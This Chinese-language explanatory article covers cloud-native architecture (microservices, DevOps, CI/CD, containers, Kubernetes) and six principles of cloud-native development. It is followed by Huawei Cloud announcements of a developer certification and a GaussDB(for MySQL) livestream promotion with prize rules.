从宏观概念上讲，云原生是不同思想的集合，集目前各种热门技术之大成，根据云原生的内容，可对应下图所示的几个关键技术。      在实际的云原生开发过程中，团队需要一个构建和运行云原生应用程序的平台，这个平台需要具有高度自动化和集成化的特点。从具体的技术手段来说，它会涉及微服务、DevOps、持续集成（Continuous Integration，CI）与持续交付（Continuous Delivery，CD）、容器等技术。 1. 微服务技术   微服务将应用程序开发为一系列小型服务的体系结构，每个服务都实现独立的业务功能，运行在自己的进程中，并通过HTTP API或消息传递进行通信。每个微服务都可以独立于应用程序中的其他服务进行部署、升级、扩展和重新启动，通常作为自动化系统的一部分，能够在不影响最终用户的情况下频繁更新现场应用程序。   值得一提的是，微服务领域有一个著名的“康威定律”：设计系统的组织、最终产生的设计等同于组织之内、之间的沟通结构。这意味着设计系统的企业生产的设计等同于企业内的沟通结构。下图形象地说明了这一概念，展现了企业现有沟通结构。简单地说，企业结构等于系统设计。    2. DevOps   DevOps技术通过自动化软件交付和架构变更的流程，使得构建、测试、发布软件能够更加地快捷、频繁和可靠，如图所示。      可以把 DevOps 看作开发（软件工程）、技术运营和质量保障（QA）三者的交集。传统的软件组织将开发、IT运营和质量保障（OA）设为各自独立的部门，在这种环境下如何采用新的开发方法（例如敏捷软件开发）是一个重要的课题。按照从前的工作方式，开发和部署不需要IT部门支持或者QA跨部门的支持，而现在却需要极其紧密的多部门协作。DevOps考虑的还不只是软件部署，它是一套针对这几个部门间沟通与协作问题的流程和方法。需要频繁交付的企业可能更需要了解DevOps。如果一个组织要生产面向多种用户、具备多样功能的应用程序，其部署周期必然会很短。这种能力也被称为持续部署，并且经常与精益创业方法联系起来。 DevOps的引入对产品交付、测试、功能开发和维护起到意义深远的影响。在缺乏DevOps能力的组织中，开发与运营之间存在着信息“鸿沟”。例如运营人员要求更好的可靠性和安全性，开发人员希望基础设施响应更快，而业务人员的需求则是更快地将更多的特性发布给最终用户使用。这种信息鸿沟就是最常出问题的地方。 以下几方面因素可能促使一个组织引入DevOps： - 使用敏捷或其他软件开发过程与方法； - 业务负责人要求加快产品交付的速度； - 虚拟化和云计算基础设施（可能来自内部或外部供应商）日益普遍； - 数据中心自动化技术和配置管理工具的普及。   DevOps 经常被描述为“开发团队与运营团队之间更具协作性、更高效的关系”。由于团队间协作关系的改善，整个组织的效率因此得到提升，伴随而来的生产环境的风险也得到降低。 DevOps的落地实现需要通过一套集成的工具链，具体包括以下目标： - 开发、交付和运维工具之间的实时协作； - 实现从需求获取和需求评审到设计和代码分析的持续规划； - 落实测试策略以实施持续测试； - 当成功完成代码签入后，通过自动触发构建持续集成； - 测试自动化脚本可以按照作业计划执行，实现持续交付； - 通过报告和仪表板持续监测程序发布质量； - 可通过自动化的缺陷识别和解决方案，帮助用户快速响应变更； - 可以提供基于关键绩效指标（KPI）的有价值的报告，以便用户快速做出决策； - 通过跟踪发布流水线实现持续交付。 3. 持续集成与持续交付技术   持续集成是一种软件开发的实践方法，它要求团队成员经常整合他们的工作成果（通常是程序代码）。通常情况下，团队成员中的每人每天至少提交一次自己的代码到代码仓库做集成构建，这样对于整个项目而言，每天就会有多次集成构建。每次构建都自动集成，这个过程通常还包括通过测试用例进行验证，以尽快检测构建错误。实践证明，许多团队都发现这种方法可以显著减少软件的构建错误，并且可以让团队更快速地交付整体软件功能。   持续交付是一种以可持续的方式安全快速地将所有类型的软件变更（包括新功能开发、配置更改、Bug修复等）转化为生产环节下的工作产品交付给用户直接使用的软件过程控制方法，它的最终目标是将变更直接部署到生产环境。即使面对大规模分布式系统、复杂的生产环境或是嵌入式系统的开发，以及平时软件的日常维护，持续交付都可以有条不紊地进行，在这个过程中，可以确保程序代码始终处于可部署状态。所以，即使是面对每天都需要进行软件开发和维护的数千名开发人员的大团队，也可以做到有条不紊地系统作战，这就完全消除了传统上必须遵循的按部就班的僵化开发流程。 4. 容器技术   容器技术与虚拟机技术相比，拥有更高的资源使用效率，因为它并不需要为每个应用分配单独的操作系统，所以实例规模更小、创建和迁移速度也更快。相对于虚拟机，单个操作系统能够承载更多的容器。云提供商十分热衷于容器技术，因为在相同的硬件设备中，可以部署数量更多的容器实例。此外，容器易于迁移，但是只能迁移到具有兼容操作系统内核的其他服务器当中，这样就给迁移选择带来限制。因为容器不像虚拟机可对内核或者虚拟硬件进行打包，所以每套容器都拥有自己的隔离化用户空间，从而使得多套容器能够运行在同一主机系统之上。正因为创建和销毁容器的开销低，所以容器成为部署单个微服务的理想计算工具。 **容器化最大的好处是保持运行环境的一致性，只要应用可以打包成容器镜像（通常使用 Docker容器），就可以一次编译后，在各处运行。** 同时，容器也可以作为应用运行的最小组件来部署，且更适合作为无状态应用运行。结合容器编排工具（如Kubernetes）将大大增强系统的扩展性和自愈能力，轻松应对大流量下的高并发场景，加快业务的迭代速度。Kubernetes作为CNCF（云原生计算基金会）成员的核心，本身就是与云原生应用的理念紧密结合的产物。Kubernetes的整体架构如图：    综上，我们可以归纳出云原生的三个主要目标： - 充分利用云计算技术的优势：采用云端优先策略，从云服务中获取最大价值； - 实现快速、敏捷、频繁的交付模式； - 通过技术创新更多地扩展云计算技术的边界。 云原生中包含的不同思想，与其所解释的云上应用架构应该具备的特性几乎是一一对应的： - DevOps、持续交付对应更快的上线速度，即敏捷性； - 微服务对应可扩展性及故障可恢复性； - 敏捷基础设施实现了扩展能力的资源层支持； - 康威定律在组织结构和流程上确保架构特性能够快速实施。   实际上云原生应用架构应该适用于任何应用类型。云原生应用架构适用于异构语言的程序开发，不仅仅是针对Java 语言。目前云原生应用生态系统已经初具规模，CNCF成员不断发展壮大，基于Cloud Native的创业公司不断涌现，Kubernetes引领容器编排潮流和Service Mesh技术，Go语言的兴起等，这些都为将传统应用迁移到云原生架构提供了更多的选择。 ## 云原生应用开发的原则   云原生的开发范式是软件开发演进的一种新型范式，它不仅仅是将应用程序迁移和移植到云平台上运行，更加关注如何利用云计算并最大限度地发挥其优势。为了实现这一目标，在生产和开发过程中，软件开发相关的部门都需要认真关注如何使用云服务，进而关注并实践如何构建云原生应用。综合前面章节的内容，可以归纳云原生应用开发的几项原则。 1. 原则1：云服务优先策略 原则：云服务优先策略（Cloud-First）。 描述：在评估技术解决方案中的服务或组件时，首先要考察目前市面上是否有可用的云服务功能，并优先考虑使用最适合用户需求的云服务。 理由：将需要自己负责全新开发的软件模块数量降到最低、最合理水平。例如可以直接利用云端的应用程序平台、数据库、持续集成、持续交付、数据分析服务、缓存服务、负载平衡服务等云服务功能，开发团队仅围绕这些服务构建定制化的软件，将主要的开发精力聚焦在业务功能的实现上。 参考建议： 云原生的服务应该部署在云端，除非受限于一些特殊的环境因素，如安全、合规问题，或者受限于特殊的网络、集成需求问题。 SaaS适用于一些大中型应用功能，同时也支持自定义和个性化设置，这一点相对于版权许可软件来说更具灵活性。 必须权衡考虑版权许可软件和开源软件。 2. 原则2：基础设施即代码 原则：基础设施即代码（Infrastructure as Code，IaC）。 描述：以处理应用程序代码相同的方式来管理基础设施配置以及工作流的定义。 理由：通过 API 的方式来构建环境，提供管理和执行运行环境工作流的工具，这使得环境配置可以视为软件功能的一部分。通过管理环境配置代码和应用程序代码，可以获得更好的总体配置管理体验。整个运行时环境都可以用版本化的方式进行管理。 参考建议： 需要使用支持IaC的工具； 需要为应用软件及其运行环境编写相应的测试脚本； 环境的准备和配置不可以通过手动操作的方式进行。 3. 原则3：敏捷交付 原则：敏捷交付（Agile Delivery）。 描述：在交付过程的各个阶段争取敏捷，包括开发前的项目启动和计划阶段，以及开发后发布管理和运维管理阶段。 基本原理：敏捷软件开发过程通常能使产品更快地投入生产，但如果开发过程控制过于死板，项目开发就无法敏捷，只有力争各个阶段保持敏捷，才可以最大限度地提高效益。 理由： 前期开发规划应充分考虑项目迭代周期与开发交付周期之间的呼应关系，使软件的开发过程适应敏捷开发的过程控制方式。 必须设定一个初始交付目标，这个交付物必须是可以运行的工作成果。 随着业务目标的调整，对于开发过程中的需求变更应该抱有开放的态度，拥抱变化。 开发团队和运维团队紧密合作，力求做到频繁发布，充分采用DevOps的开发理念。 快速试错，避免冗长的QA测试环节，最大程度地降低交付风险。 4. 原则4：自动化交付原则 原则：自动化交付原则（Delivery Automation）。 描述：力求在开发运维过程中做到从构建到发布的全自动化。 理由：实现软件构建、环境准备、测试和部署的自动化能力可以使得产品在加速市场化的过程中占据绝对的优势。 参考建议： 这个原则建立在前面的基础设施即代码的原则之上。 自动化测试工具是必需的。 “快速试错”的方法是为了加快部署和自动化生产。 应该设计一个监控系统和回滚计划，以便快速检测和回退有问题的版本，而不用等待错误修复。 5. 原则5：基于服务架构 原则：基于服务架构（Service-Based Architecture）。 描述：必须按照既定的项目目标和期望的特点来遵循各种形式的基于服务的体系结构（SBA）。 理由：所有形式的基于服务的体系结构都有其优点，应该加以利用。 虽然在选择一种具体的形式时需要权衡，但应该考虑和评估各种服务形式，为给定的解决方案确定最合适的架构方法。 参考建议： 为了确定基于服务的体系结构最适合的应用，在软件开发生命周期的早期就需要进行一些分析。 所有形式的SBA都要求按API的规范化开发。 应采用API优先开发战略。 需要考虑API的接口风格的标准化。 需要考虑API的接口的安全性，并采取相应的措施保障API不暴露给不安全或不受信的网络。 6. 原则6：12要素应用 原则：12要素应用（Twelve-Factor Applications）。12要素如图所示：    描述：遵循最佳实践（如12要素应用原则），开发云原生应用程序。 理由：一些组织多年来一直致力于开发云原生应用程序，并开始记录最佳实践，需要吸取别人的教训，并在适当的时候采取最佳作法。 参考建议： 构建过程，发布过程和配置管理实践可能受某些最佳实践的影响。 一些最佳实践会影响应用程序的部署和管理方式，因此可能有必要查看运营团队成员的最佳实践。

尊敬的客户：您好！为帮助您深入了解华为云产品，探索新的技术场景，我们非常高兴地与您分享一个好消息：为了更好地服务千万开发者，华为云推出开发者认证，真正让开发者在云上作业，懂开发会开发，与开发者共成长。由华为资深研发团队精心打磨，潜心研发的《云原生入门级开发者认证》于2022年3月7日正式上线！届时请进入华为云开发者学堂-开发者认证-云原生查看产品详情，体验使用，我们非常期待您的宝贵建议。以下为该开发者认证详情，您可提前了解：产品名称: 《云原生入门级开发者认证》适合人群： 高校学生、开发工程师、运维工程师等；培训方案： 从云原生开源技术讲到华为云云原生相关服务能力及增强特性；技术能力： 掌握容器、服务网格、微服务、DevOps等云原生核心技术及云上开发实践能力；认证价值： 通过理论结合实践，使云原生相关从业者具备云原生基础的理论知识和实操能力 。届时我们还将开展相关开发者认证上新活动，详情请关注华为云开发者学堂论坛-热门活动 相关通知。发布日期：2022年3月7日

【活动时间】2022/3/7—3/31【直播时间】2022年3月22日 19:00~20:30【直播主题】GaussDB(for MySQL)关键特性发布和技术解读本次直播GaussDB(for MySQL)将正式发布HTAP混合负载特性，复杂查询效率提升百倍，让企业决策更加快速，准确【嘉宾简介】主讲老师：佳恩，华为云数据库高级产品经理10年技术运维，数据库管理经验，熟悉MySQL，SQL Server等数据库引擎原理，设计，商业运营，目前负责华为云数据库GaussDB产品管理工作【参与方式】 注：以下3个话题均可参与，且盖楼评奖相互独立，每个有效盖楼30层以上开奖活动一：  分享海报或活动帖  ，回帖盖楼送好礼【直播报名入口】点我马上报名，3月22日可以收看直播哟！直播报名后，转发分享下方“活动海报”或“本帖”至朋友圈，+转发语：3月22日19：00， GaussDB(for MySQL) 关键特性发布和技术解读，参与活动就能赢取数10种礼品，一起参与吧！公开可见保持2小时以上，将转发内容的朋友圈截图回复至下方评论区回帖内容：华为云账号+转发截图奖励如下：奖品数量发放规则开发者定制笔记本/GaussDB字母笔数量不限每6层随机抽取一个幸运用户米格系列移动电源2500mA数量不限有效盖楼层数≥100层，按回帖格式回帖的用户，每增加10层，增加一个中奖机会 活动二：看直播，惊喜多多哦 （3月22日 19:00-20:30 ）  参与方式：>>>戳我观看直播<<<，直播期间发送小助手给出的口令，参与直播互动，就有机会参与抽奖奖励规则：登录直播平台观看本次直播，直播间有3轮抽奖：抽奖轮数中奖数量奖品第一轮2定制水杯/公牛插座第二轮2定制字母笔/平装套芯笔记本第三轮2GaussDB(for MySQL)书籍 活动三： 优质话题互动 ——分享学习感受（3月22日观看直播后再参与）回帖内容：结合本次直播内容，基于GaussDB(for MySQL)，谈谈自己的认知、所感所想等。（视频制作前，请先联系小助手，1809232786，说明一下录制的内容，小助手可以帮忙把把关，避免跑题或者词不达意）呈现方式：视频，不短于3分钟录制要求：画质清晰，话题内容贴合要求，录制时组织好语言，视频时长3分钟左右【活动奖品&规则】奖品数量发放规则GaussDB(for MySQL)书籍 / 折叠烧水壶 / 荣耀智能体脂称23+若提交的视频被采用，即可获得左侧奖品其他活动开年采购季，8000元见面礼+0门槛抽奖，云数据库包年18元起！【参与有奖】GaussDB(for MySQL) 关键特性发布和技术解读【注意事项】1.获奖结果将在活动结束后7个工作日内进行公示，请报名和留言的伙伴关注社区内容，所有奖品将在活动结束后15个工作日内发放。2.活动奖品颜色随机，且部分奖品数量有限发完将用等值奖品代替；3.为保证活动的公平公正，华为云有权对恶意刷活动资源（“恶意”是指为获取资源而异常注册账号等**活动公平性的行为），利用资源从事违法违规行为的用户收回抽奖及奖励资格。4.本活动最终解释权归华为云所有。